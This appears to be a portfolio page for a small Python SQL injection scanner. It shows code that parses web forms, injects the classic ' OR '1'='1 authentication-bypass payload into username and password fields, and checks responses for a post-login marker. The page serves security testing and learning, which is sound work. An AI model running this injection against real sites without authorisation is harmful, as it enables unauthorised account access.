SQL Injection Scanner

SQL Injection
scanner.

Automates detection of SQL injection vulnerabilities by parsing web forms, injecting payloads, and analyzing HTTP responses for error signatures or bypass indicators.

Overview

Project Overview

Automates detection of SQL injection vulnerabilities by parsing web forms, injecting payloads, and analyzing HTTP responses for error signatures or bypass indicators.

Python BeautifulSoup Requests Security

Discovery

Form Discovery

Uses BeautifulSoup to locate forms on the page:

resp = s.get(url)
soup = BeautifulSoup(resp.content, "html.parser")
forms = soup.find_all("form")

Returns each <form> element for further analysis.

Payloads

Payload Construction

Extracts form details, then builds a data dictionary injecting "' OR '1'='1" into input fields named username or password:

for field in details['inputs']:
    if field['name'].lower() in ('user', 'username', 'password'):
        data[field['name']] = "' OR '1'='1"
    elif field['type']=='hidden' or field['value']:
        data[field['name']] = field['value']
    else:
        data[field['name']] = 'testing'

Preserves hidden fields and assigns dummy values to others.

Execution

Attack Execution & Analysis

Sends the crafted payload via GET or POST and inspects the response body:

if method=='post':
    resp = s.post(action_url, data=data)
else:
    resp = s.get(action_url, params=data)
body = resp.text.lower()
if 'sign off' in body:
    print("Authentication bypass detected")
else:
    print("No bypass detected")

Flags a successful bypass when the response contains known post-login markers (e.g., "Sign Off").

Learnings

Key Takeaways

  • Dynamic form parsing with BeautifulSoup for versatile input handling.
  • Automated payload injection covering GET/POST scenarios.
  • Response analysis using string matching for reliable vulnerability detection.
View Full Code on GitHub